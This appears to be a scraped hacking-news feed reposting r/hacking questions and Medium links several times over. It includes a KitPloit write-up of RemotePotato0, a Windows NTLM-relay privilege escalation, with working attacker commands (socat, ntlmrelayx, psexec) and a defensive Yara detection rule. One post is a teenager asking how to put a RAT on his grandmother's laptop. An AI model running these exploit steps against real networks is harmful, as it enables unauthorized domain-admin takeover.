hacking: security in practice
Looking to start a hacking livestream where we go over different exploits and would love to have a co-host or guests
So I just got back from a trip where I was an expert whiteness in the field of cyber security. I learned a lot from that experience mainly that the general public has no idea about anything regarding hacking. The particular case involved a (rat) so for the first couple of streams I’d like to go over rats and demo them.
I have a subscription to remcos, I have setup a completely separate internet account for hacking, I have a target machine with a fresh install of windows and deep freeze installed on it. The goal would be to eventually let other people try to hack the machine live then simply restart the machine to remove any infections and start securing the machine little by little.
I would also like to go over wireless attacks and have a lot of the Hak5 gear to aid in physical attacks as well.
Any thoughts anyone would like to help?
submitted by /u/Lamoneyman
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Looking to start a hacking livestream where we go over different exploits and would love to have a co-host or guests
So I just got back from a trip where I was an expert whiteness in the field of cyber security. I learned a lot from that experience mainly that the general public has no idea about anything regarding hacking. The particular case involved a (rat) so for the first couple of streams I’d like to go over rats and demo them.
I have a subscription to remcos, I have setup a completely separate internet account for hacking, I have a target machine with a fresh install of windows and deep freeze installed on it. The goal would be to eventually let other people try to hack the machine live then simply restart the machine to remove any infections and start securing the machine little by little.
I would also like to go over wireless attacks and have a lot of the Hak5 gear to aid in physical attacks as well.
Any thoughts anyone would like to help?
submitted by /u/Lamoneyman
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Looking to start a hacking livestream where we go over different...
So I just got back from a trip where I was an expert whiteness in the field of cyber security. I learned a lot from that experience mainly that...
hacking: security in practice
Email password lost
I have an email adress that belongs to me, it was somehow removed from my device and when I try to do the forgot password it sends an otp to a device which I am not familiar with, can anyone give me any solution?
submitted by /u/ayushchugh23
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Email password lost
I have an email adress that belongs to me, it was somehow removed from my device and when I try to do the forgot password it sends an otp to a device which I am not familiar with, can anyone give me any solution?
submitted by /u/ayushchugh23
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Email password lost
I have an email adress that belongs to me, it was somehow removed from my device and when I try to do the forgot password it sends an otp to a...
hacking: security in practice
No idea if this is allowed here but is it possible to make a RAT from my phone?
I’m at my grandmas house right now and I’ve always wanted to try and make a RAT but I don’t have my pc. I wanted to try and get into her laptop with a RAT. The laptop is an old one that she never uses and keeps unplugged. But I only have my iPhone.
This is for educational purposes only and I’m inexperienced in hacking in general. I’m also only 15 so I can’t go to the store to get something if I need it. Thanks for any help!
submitted by /u/Kitkatgamer6
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
No idea if this is allowed here but is it possible to make a RAT from my phone?
I’m at my grandmas house right now and I’ve always wanted to try and make a RAT but I don’t have my pc. I wanted to try and get into her laptop with a RAT. The laptop is an old one that she never uses and keeps unplugged. But I only have my iPhone.
This is for educational purposes only and I’m inexperienced in hacking in general. I’m also only 15 so I can’t go to the store to get something if I need it. Thanks for any help!
submitted by /u/Kitkatgamer6
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
No idea if this is allowed here but is it possible to make a RAT...
I’m at my grandmas house right now and I’ve always wanted to try and make a RAT but I don’t have my pc. I wanted to try and get into her laptop...
RemotePotato0 - Just Another "Won't Fix" Windows Privilege Escalation From User To Domain Admin
Just another "Won't Fix" Windows Privilege Escalation from User to Domain Admin. RemotePotato0 is an exploit that allows you to escalate your privileges from a generic User to Domain Admin. Briefly: It abuses the DCOM activation service and trigger an NTLM authentication of the user currently logged on in the target machine. It is required you have a shell in session 0 (e.g. WinRm shell or SSH shell) and that a privileged user is logged on in the session 1 (e.g. a Domain Admin user). Once the NTLM type1 is triggered we setup a cross protocol relay server that receive the privileged type1 message and relay it to a third resource by unpacking the RPC protocol and packing the authentication over HTTP. On the receiving end you can setup a further relay node (eg. ntlmrelayx) or relay directly to a privileged resource. Full details at --> https://labs.sentinelone.com/relaying-potatoes-dce-rpc-ntlm-relay-eopExample Attacker machine (192.168.83.130): sudo socat TCP-LISTEN:135,fork,reuseaddr TCP:192.168.83.131:9998 &sudo ntlmrelayx.py -t ldap://192.168.83.135 --no-wcf-server --escalate-user winrm_user_1 Victim machine (192.168.83.131): .\RemotePotato0.exe -r 192.168.83.130 -p 9998 Victim Domain Controller (192.168.83.135) Enjoy shell (eg. psexec) as Enterprise Admin to the domain controller ;) psexec.py 'SPLINTER/winrm_user_1:Password111!@192.168.83.135' Demo Detection Yara rule to detect RemotePotato0 binary: rule SentinelOne_RemotePotato0_privesc { meta: author = "SentinelOne" description = "Detects RemotePotato0 binary" reference = "https://labs.sentinelone.com/relaying-potatoes-dce-rpc-ntlm-relay-eop" strings: $import1 = "CoGetInstanceFromIStorage" $istorage_clsid = "{00000306-0000-0000-c000-000000000046}" nocase wide ascii $meow_header = { 4d 45 4f 57 } $clsid1 = "{11111111-2222-3333-4444-555555555555}" nocase wide ascii $clsid2 = "{5167B42F-C111-47A1-ACC4-8EABE61B0B54}" nocase wide ascii condition: (uint16(0) == 0x5A4D) and $import1 and $istorage_clsid and $meow_header and 1 of ($clsid*)} Authors Antonio Cocomazzi Andrea Pierini Credits Impacket Download RemotePotato0
Read more...
___________________________
@hacking_Attack
@Hacking_Video
Just another "Won't Fix" Windows Privilege Escalation from User to Domain Admin. RemotePotato0 is an exploit that allows you to escalate your privileges from a generic User to Domain Admin. Briefly: It abuses the DCOM activation service and trigger an NTLM authentication of the user currently logged on in the target machine. It is required you have a shell in session 0 (e.g. WinRm shell or SSH shell) and that a privileged user is logged on in the session 1 (e.g. a Domain Admin user). Once the NTLM type1 is triggered we setup a cross protocol relay server that receive the privileged type1 message and relay it to a third resource by unpacking the RPC protocol and packing the authentication over HTTP. On the receiving end you can setup a further relay node (eg. ntlmrelayx) or relay directly to a privileged resource. Full details at --> https://labs.sentinelone.com/relaying-potatoes-dce-rpc-ntlm-relay-eopExample Attacker machine (192.168.83.130): sudo socat TCP-LISTEN:135,fork,reuseaddr TCP:192.168.83.131:9998 &sudo ntlmrelayx.py -t ldap://192.168.83.135 --no-wcf-server --escalate-user winrm_user_1 Victim machine (192.168.83.131): .\RemotePotato0.exe -r 192.168.83.130 -p 9998 Victim Domain Controller (192.168.83.135) Enjoy shell (eg. psexec) as Enterprise Admin to the domain controller ;) psexec.py 'SPLINTER/winrm_user_1:Password111!@192.168.83.135' Demo Detection Yara rule to detect RemotePotato0 binary: rule SentinelOne_RemotePotato0_privesc { meta: author = "SentinelOne" description = "Detects RemotePotato0 binary" reference = "https://labs.sentinelone.com/relaying-potatoes-dce-rpc-ntlm-relay-eop" strings: $import1 = "CoGetInstanceFromIStorage" $istorage_clsid = "{00000306-0000-0000-c000-000000000046}" nocase wide ascii $meow_header = { 4d 45 4f 57 } $clsid1 = "{11111111-2222-3333-4444-555555555555}" nocase wide ascii $clsid2 = "{5167B42F-C111-47A1-ACC4-8EABE61B0B54}" nocase wide ascii condition: (uint16(0) == 0x5A4D) and $import1 and $istorage_clsid and $meow_header and 1 of ($clsid*)} Authors Antonio Cocomazzi Andrea Pierini Credits Impacket Download RemotePotato0
Read more...
___________________________
@hacking_Attack
@Hacking_Video
SentinelOne
Relaying Potatoes: Another Unexpected Privilege Escalation Vulnerability in Windows RPC Protocol - SentinelLabs
A newly-discovered NTLM relay attack makes every Windows system vulnerable to an escalation of privileges attack, and there's no patch in sight.
Hacking Articles Tips Tricks Videos Tutorials
RemotePotato0_1_demo-709924.gif
KitPloit - PenTest Tools!
RemotePotato0 - Just Another "Won't Fix" Windows Privilege Escalation From User To Domain Admin
http://2.bp.blogspot.com/-pWYsKrzpUyo/YOJXRmQ3UjI/AAAAAAAAf88/DRdj-GxhNxMvP9LcDtNU9npAn7B27U0GACK4BGAYYCw/w640-h336/RemotePotato0_1_demo-709924.gif
Just another "Won't Fix" Windows Privilege Escalation from User to Domain Admin.
RemotePotato0 is an exploit that allows you to escalate your privileges from a generic User to Domain Admin.
Briefly:
It abuses the DCOM activation service and trigger an NTLM authentication of the user currently logged on in the target machine. It is required you have a shell in session 0 (e.g. WinRm shell or SSH shell) and that a privileged user is logged on in the session 1 (e.g. a Domain Admin user). Once the NTLM type1 is triggered we setup a cross protocol relay server that receive the privileged type1 message and relay it to a third resource by unpacking the RPC protocol and packing the authentication over HTTP. On the receiving end you can setup a further relay node (eg. ntlmrelayx) or relay directly to a privileged resource.
Full details at --> https://labs.sentinelone.com/relaying-potatoes-dce-rpc-ntlm-relay-eop
Example
Attacker machine (192.168.83.130):
Victim machine (192.168.83.131):
Victim Domain Controller (192.168.83.135)
Enjoy shell (eg. psexec) as Enterprise Admin to the domain controller ;)
Demo
https://1.bp.blogspot.com/-i-3pnPRIowA/YOTpzCKLGII/AAAAAAAAhkk/-xBaxRDITSI4RBOmknb5R7aLsnQngrtjwCNcBGAsYHQ/w640-h334/RemotePotato0_1_demo.gif
Detection
Yara rule to detect RemotePotato0 binary:
Authors
* Antonio Cocomazzi
* Andrea Pierini
Credits
* Impacket
Download RemotePotato0
___________________________
@hacking_Attack
@Hacking_Video
RemotePotato0 - Just Another "Won't Fix" Windows Privilege Escalation From User To Domain Admin
http://2.bp.blogspot.com/-pWYsKrzpUyo/YOJXRmQ3UjI/AAAAAAAAf88/DRdj-GxhNxMvP9LcDtNU9npAn7B27U0GACK4BGAYYCw/w640-h336/RemotePotato0_1_demo-709924.gif
Just another "Won't Fix" Windows Privilege Escalation from User to Domain Admin.
RemotePotato0 is an exploit that allows you to escalate your privileges from a generic User to Domain Admin.
Briefly:
It abuses the DCOM activation service and trigger an NTLM authentication of the user currently logged on in the target machine. It is required you have a shell in session 0 (e.g. WinRm shell or SSH shell) and that a privileged user is logged on in the session 1 (e.g. a Domain Admin user). Once the NTLM type1 is triggered we setup a cross protocol relay server that receive the privileged type1 message and relay it to a third resource by unpacking the RPC protocol and packing the authentication over HTTP. On the receiving end you can setup a further relay node (eg. ntlmrelayx) or relay directly to a privileged resource.
Full details at --> https://labs.sentinelone.com/relaying-potatoes-dce-rpc-ntlm-relay-eop
Example
Attacker machine (192.168.83.130):
sudo socat TCP-LISTEN:135,fork,reuseaddr TCP:192.168.83.131:9998 &
sudo ntlmrelayx.py -t ldap://192.168.83.135 --no-wcf-server --escalate-user winrm_user_1
Victim machine (192.168.83.131):
.\RemotePotato0.exe -r 192.168.83.130 -p 9998
Victim Domain Controller (192.168.83.135)
Enjoy shell (eg. psexec) as Enterprise Admin to the domain controller ;)
psexec.py 'SPLINTER/winrm_user_1:Password111!@192.168.83.135'
Demo
https://1.bp.blogspot.com/-i-3pnPRIowA/YOTpzCKLGII/AAAAAAAAhkk/-xBaxRDITSI4RBOmknb5R7aLsnQngrtjwCNcBGAsYHQ/w640-h334/RemotePotato0_1_demo.gif
Detection
Yara rule to detect RemotePotato0 binary:
rule SentinelOne_RemotePotato0_privesc {
meta:
author = "SentinelOne"
description = "Detects RemotePotato0 binary"
reference = "https://labs.sentinelone.com/relaying-potatoes-dce-rpc-ntlm-relay-eop"
strings:
$import1 = "CoGetInstanceFromIStorage"
$istorage_clsid = "{00000306-0000-0000-c000-000000000046}" nocase wide ascii
$meow_header = { 4d 45 4f 57 }
$clsid1 = "{11111111-2222-3333-4444-555555555555}" nocase wide ascii
$clsid2 = "{5167B42F-C111-47A1-ACC4-8EABE61B0B54}" nocase wide ascii
condition:
(uint16(0) == 0x5A4D) and $import1 and $istorage_clsid and $meow_header and 1 of ($clsid*)
}
Authors
* Antonio Cocomazzi
* Andrea Pierini
Credits
* Impacket
Download RemotePotato0
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
RemotePotato0 - Just Another "Won't Fix" Windows Privilege Escalation From User To Domain Admin
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
PacketMaze Pcap Analysis Walkthrough
https://cdn-images-1.medium.com/max/1920/1*VGhnwX0YvmpkY0nZ3p41Hg.png
SITE : https://cyberdefenders.org/
Continue reading on InfoSec Write-ups »
___________________________
@hacking_Attack
@Hacking_Video
PacketMaze Pcap Analysis Walkthrough
https://cdn-images-1.medium.com/max/1920/1*VGhnwX0YvmpkY0nZ3p41Hg.png
SITE : https://cyberdefenders.org/
Continue reading on InfoSec Write-ups »
___________________________
@hacking_Attack
@Hacking_Video
Medium
PacketMaze Pcap Analysis Walkthrough
SITE : https://cyberdefenders.org/
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Flaws in the 3 common Networking Topologies
https://cdn-images-1.medium.com/max/612/1*Lmad2C_vJIyph6pvFgvymg.jpeg
What is the major flaw in Ring , Bus and Star topologies
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Flaws in the 3 common Networking Topologies
https://cdn-images-1.medium.com/max/612/1*Lmad2C_vJIyph6pvFgvymg.jpeg
What is the major flaw in Ring , Bus and Star topologies
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Flaws in the 3 common Networking Topologies
What is the major flaw in Ring , Bus and Star topologies
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
The Quick Guide to Understanding Supply Chain Attacks
https://cdn-images-1.medium.com/max/1280/0*EOUROQrvRfJ6CRWr.jpg
Your web of trust is about to feel a whole lot weaker
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
The Quick Guide to Understanding Supply Chain Attacks
https://cdn-images-1.medium.com/max/1280/0*EOUROQrvRfJ6CRWr.jpg
Your web of trust is about to feel a whole lot weaker
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
The Quick Guide to Understanding Supply Chain Attacks
Your web of trust is about to feel a whole lot weaker
hacking: security in practice
Can anybody TL;DR rarjpeg?
So my friend tells me about this thing that can glue images together to hide files within images... And it's quite volatile and dangerous to our peculiar happenstance.
Is this the right subreddit to be posting about this? What can be done to prevent/detect this?
submitted by /u/Davidier
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Can anybody TL;DR rarjpeg?
So my friend tells me about this thing that can glue images together to hide files within images... And it's quite volatile and dangerous to our peculiar happenstance.
Is this the right subreddit to be posting about this? What can be done to prevent/detect this?
submitted by /u/Davidier
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Reddit
[deleted by user] : r/hacking
2.9M subscribers in the hacking community. A subreddit dedicated to hacking and hackers.
Constructive collaboration and learning about exploits, industry standards, grey and white hat hacking, new hardware and software hacking technology, sharing ideas and…
Constructive collaboration and learning about exploits, industry standards, grey and white hat hacking, new hardware and software hacking technology, sharing ideas and…
hacking: security in practice
Looking for malware samples
Looking to find a good source of malware samples to download and analyze. Currently testing with SentinelOne EDR/AV and trying to learn the software and study the results of a compromise.
I used to have a subscription to virustotal, but no longer have access.
Any suggestions?
submitted by /u/PrimaryWatercress759
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Looking for malware samples
Looking to find a good source of malware samples to download and analyze. Currently testing with SentinelOne EDR/AV and trying to learn the software and study the results of a compromise.
I used to have a subscription to virustotal, but no longer have access.
Any suggestions?
submitted by /u/PrimaryWatercress759
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Looking for malware samples
Looking to find a good source of malware samples to download and analyze. Currently testing with SentinelOne EDR/AV and trying to learn the...
hacking: security in practice
There a better case for a Deauther watch V3?
Is there a better case? I’d like to replace it and just use it not as a watch (too bulky)? Saw Ed Calderon have one, I kinda want a setup similar to that
submitted by /u/mav_xiii
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
There a better case for a Deauther watch V3?
Is there a better case? I’d like to replace it and just use it not as a watch (too bulky)? Saw Ed Calderon have one, I kinda want a setup similar to that
submitted by /u/mav_xiii
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
There a better case for a Deauther watch V3?
Is there a better case? I’d like to replace it and just use it not as a watch (too bulky)? Saw Ed Calderon have one, I kinda want a setup similar...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Want to Learn Hacking? TryHackMe
https://cdn-images-1.medium.com/max/1300/1*D8iH_941Z5v156GcMBeaWQ.jpeg
All in one Gateway to Learning Ethical Hacking
Continue reading on Medium »
Want to Learn Hacking? TryHackMe
https://cdn-images-1.medium.com/max/1300/1*D8iH_941Z5v156GcMBeaWQ.jpeg
All in one Gateway to Learning Ethical Hacking
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Understanding the MITRE Engenuity ATT&CK Carbanank FIN7 Evaluation Results:
https://cdn-images-1.medium.com/max/1600/0*1K_EaOQox4EnlEf2
Cutting Through the Marketing Buzzwords & How Everyone Can Become a Winner
Continue reading on CyCraft »
Understanding the MITRE Engenuity ATT&CK Carbanank FIN7 Evaluation Results:
https://cdn-images-1.medium.com/max/1600/0*1K_EaOQox4EnlEf2
Cutting Through the Marketing Buzzwords & How Everyone Can Become a Winner
Continue reading on CyCraft »
hacking: security in practice
rust
So I recently paid a guy to make me rust cheats so I could sell it to sum people. Im pretty sure the file he sent was a virus, but I'm not sure. Is there any way of checking?
submitted by /u/Emerald_Sniper
[link] [comments]
rust
So I recently paid a guy to make me rust cheats so I could sell it to sum people. Im pretty sure the file he sent was a virus, but I'm not sure. Is there any way of checking?
submitted by /u/Emerald_Sniper
[link] [comments]
reddit
rust
So I recently paid a guy to make me rust cheats so I could sell it to sum people. Im pretty sure the file he sent was a virus, but I'm not sure....
hacking: security in practice
House hold items acting up
The lights in the front of my house have been blinking on and off when I take my dog out to pee at night and my door bell camera doesn’t work during that time. It happens quite often. Apparently my wifi has “weak security.” Maybe just paranoid but it’s a little too coincidental in my opinion to be happening this often. Lights aren’t connected to WiFi. Can anyone offer any insight? If not that’s cool. First time posting on here.
submitted by /u/tonitone223
[link] [comments]
House hold items acting up
The lights in the front of my house have been blinking on and off when I take my dog out to pee at night and my door bell camera doesn’t work during that time. It happens quite often. Apparently my wifi has “weak security.” Maybe just paranoid but it’s a little too coincidental in my opinion to be happening this often. Lights aren’t connected to WiFi. Can anyone offer any insight? If not that’s cool. First time posting on here.
submitted by /u/tonitone223
[link] [comments]
reddit
House hold items acting up
The lights in the front of my house have been blinking on and off when I take my dog out to pee at night and my door bell camera doesn’t work...